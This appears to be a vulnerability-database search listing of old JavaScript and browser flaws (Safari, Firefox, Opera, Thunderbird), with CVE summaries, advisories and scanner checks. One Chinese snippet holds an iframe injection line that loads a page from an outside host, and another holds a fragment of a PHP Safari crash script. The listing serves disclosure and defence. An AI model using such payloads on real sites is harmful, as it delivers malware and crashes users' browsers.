
655 matches found

Exploit DB
added 2010/12/22 12:0 a.m. | 32 views

Apple iOS Safari - 'JS .' Remote Crash

Apple iPhone 3 Safari JavaScript - dot / '.' Remote Crash . = '$string'; "; iffileputcontents"./crash.html", $code echo"Point your safari mobile browser to crash.html.\r\n"; else echo"Cannot create file.\r\n"; ?...

7.4 AI score
Exploits: 0
CVE
added 2010/12/10 6:0 p.m. | 80 views

CVE-2010-3773

CVE-2010-3773 affects Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11. The flaw involves the XMLHttpRequestSpy module in the Firebug add-on mishandling interaction between the XMLHttpRequestSpy object and chrome privileged objects, allowing remote attackers to e...

6.8 CVSS | 9.4 AI score | 0.01046 EPSS
Exploits: 0 | References: 17 | Affected Software: 1
VulnCheck KEV
added 2010/10/27 12:0 a.m. | 0 views

VulnCheck KEV: CVE-2010-3765

Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation...

9.8 CVSS | 7.7 AI score | 0.86773 EPSS
Exploits: 14 | References: 1
UbuntuCve
added 2010/04/05 12:0 a.m. | 25 views

CVE-2010-0176

Mozilla Firefox before 3.0.19, 3.5.x before 3.5.9, and 3.6.x before 3.6.2; Thunderbird before 3.0.4; and SeaMonkey before 2.0.4 do not properly manage reference counts for option elements in a XUL tree optgroup, which might allow remote attackers to execute arbitrary code via unspecified vectors...

9.3 CVSS | 7.6 AI score | 0.05361 EPSS
Exploits: 0 | References: 3
myhack58
added 2010/01/30 12:0 a.m. | 11 views

Sohu 2 0 1 0 show channels exist hung it to the vulnerability 0day-vulnerability warning-the black bar safety net

Together to chat about the show section,not the user input is strict filtering,which leads can be inserted into the malicious code so as to achieve hung it to the object. ! Test code: Copy the code document. write"iframe width='1 0 0 0' height=1 0 0 0' src='http://www.hackqing.cn/mm.htm/iframe";...

0.5 AI score
Exploits: 0
Prion
added 2009/09/09 5:30 p.m. | 6 views

Cross site scripting

Unspecified vulnerability in Adium before 1.2 has unknown impact and attack vectors related to javascript: URLs, possibly cross-site scripting XSS...

10 CVSS | 6.4 AI score | 0.00404 EPSS
Exploits: 0 | References: 2 | Affected Software: 1
securityvulns
added 2009/07/22 12:0 a.m. | 52 views

Mozilla Foundation Security Advisory 2009-37

Mozilla Foundation Security Advisory 2009-37 Title: Crash and remote code execution using watch and defineSetter on SVG element Impact: Critical Announced: July 21, 2009 Reporter: PenPal Products: Firefox Fixed in: Firefox 3.5 Firefox 3.0.12 Description Security researcher PenPal reported a crash...

10 CVSS | 0.3 AI score | 0.0647 EPSS
Exploits: 1
Cvelist
added 2009/07/07 11:0 p.m. | 29 views

CVE-2009-2351

Opera 9.52 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting XSS attacks via vectors related to 1 injecting a Refresh header or 2 specifying the content of a Refresh header, a related issue to...

8.8 AI score | 0.00397 EPSS
Exploits: 1 | References: 5
RedHat Linux
added 2009/04/22 1:40 a.m. | 2 views

Firefox 3 JavaScript engine crashes

The JavaScript engine in Mozilla Firefox 3.x before 3.0.9, Thunderbird before 2.0.0.22, and SeaMonkey before 1.1.16 allows remote attackers to cause a denial of service application crash and possibly trigger memory corruption via vectors involving 1 jsFindPropertyHelper, related to the definition...

5 CVSS | 5.9 AI score | 0.06664 EPSS
Exploits: 1 | References: 4
myhack58
added 2009/03/31 12:0 a.m. | 29 views

in the web application rootkit-vulnerability warning-the black bar safety net

Author: jianxin 80sec EMail: jianxin80sec.com Site: http://www.80sec.com Date: 2009-3-28 From: http://www.80sec.com/release/webapp-rootkit.txt Directory 0×0 0 why do we have this idea 0×0 1 A web application in the back door of the basic idea 0×0 2 The practical application of some examples 0×0 0...

7.1 AI score
Exploits: 0
OpenVAS
added 2009/03/23 12:0 a.m. | 30 views

Ubuntu Update for mozilla-thunderbird, thunderbird vulnerabilities USN-629-1

Ubuntu Update for Linux kernel vulnerabilities USN-629-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN6291.nasl 7969 2017-12-01 09:23:16Z santu $ Ubuntu Update for mozilla-thunderbird, thunderbird vulnerabilities USN-629-1 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networ...

10 CVSS | 1.2 AI score | 0.31809 EPSS
Exploits: 4 | References: 2
seebug.org
added 2009/03/11 12:0 a.m. | 15 views

Big Faceless Report Generator has an unspecified vulnerability

BUGTRAQ ID: 34007 CNCAN ID:CNCAN-2009030601 Big Faceless Report Generator is a Java component used to convert XML files into PDF files. Big Faceless Report Generator has an unspecified vulnerability in its handling of JavaScript. No detailed vulnerability information is currently available. Big Faceless Organization Big Faceless Report Generator 1.11.39 Big Faceless Organization Big Faceless Report Generator 1.1.41...

6.9 AI score
Exploits: 0
OpenVAS
added 2009/03/06 12:0 a.m. | 22 views

RedHat Update for thunderbird RHSA-2008:0224-01

Check for the Version of thunderbird OpenVAS Vulnerability Test RedHat Update for thunderbird RHSA-2008:0224-01 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it und...

9.3 CVSS | 0.1 AI score | 0.17011 EPSS
Exploits: 1 | References: 2
OpenVAS
added 2009/02/27 12:0 a.m. | 24 views

CentOS Update for seamonkey CESA-2008:0223 centos3 x86_64

Check for the Version of seamonkey OpenVAS Vulnerability Test CentOS Update for seamonkey CESA-2008:0223 centos3 x8664 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify...

9.3 CVSS | 0.3 AI score | 0.17011 EPSS
Exploits: 1 | References: 2
OpenVAS
added 2009/02/27 12:0 a.m. | 20 views

CentOS Update for seamonkey CESA-2008:0223-02 centos2 i386

Check for the Version of seamonkey OpenVAS Vulnerability Test CentOS Update for seamonkey CESA-2008:0223-02 centos2 i386 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modi...

9.3 CVSS | 0.3 AI score | 0.17011 EPSS
Exploits: 1 | References: 2
exploitpack
added 2009/01/01 12:0 a.m. | 31 views

Viart shopping cart 3.5 - Multiple Vulnerabilities

Viart shopping cart 3.5 - Multiple Vulnerabilities =============================================================== !vuln ViArt Shopping Cart v3.5 is prone to multiple remote vulnerabilities. Earlier versions may also be affected. ===============================================================...

0.5 AI score
Exploits: 0
seebug.org
added 2008/07/14 12:0 a.m. | 43 views

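Apple iPhone and iPod Touch version 2.0 fixes multiple security vulnerabilities

BUGTRAQ ID: 30186 CVECAN ID: CVE-2008-1588,CVE-2008-1589,CVE-2008-2303,CVE-2008-2317,CVE-2008-1590 iPod touch (also known as iTouch) is an MP4 player released by Apple, and iPhone is the smartphone it released. Both iPhone and iPod Touch embed the Safari browser; remote attackers can exploit multiple security vulnerabilities in this browser to cause a denial of service, read sensitive information, or execute arbitrary code. CVE-2008-1588...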

10 CVSS | 6.4 AI score | 0.1599 EPSS
Exploits: 1
Packet Storm
added 2008/03/12 12:0 a.m. | 40 views

WebCT 4.x Javascript Session Stealer

WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x http://secunia.com/product/3280/ Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted again on: 20/07/2007 Date Published...

7.4 AI score
Exploits: 0
Tenable Nessus
added 2007/08/16 12:0 a.m. | 31 views

Opera < 9.23 Crafted Javascript Arbitrary Code Execution

The version of Opera installed on the remote host reportedly allows for execution of arbitrary code via specially crafted JavaScript if a user can be tricked into visiting a malicious site. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid25900; scriptversion"1.17";...

9.3 CVSS | 6.2 AI score | 0.0764 EPSS
Exploits: 1 | References: 3
Opera Security Advisories
added 2007/08/07 12:0 a.m. | 6 views

a specially crafted JavaScript can make Opera execute arbitrary code – Opera Security Advisories

a specially crafted JavaScript can make Opera execute arbitrary code – Opera Security Advisories OPCOM Team | August 7, 2007 A specially crafted JavaScript can make Opera execute arbitrary code. Severity: Highly severe Problem description A virtual function call on an invalid pointer that may...

6.2 AI score
Exploits: 0 | References: 1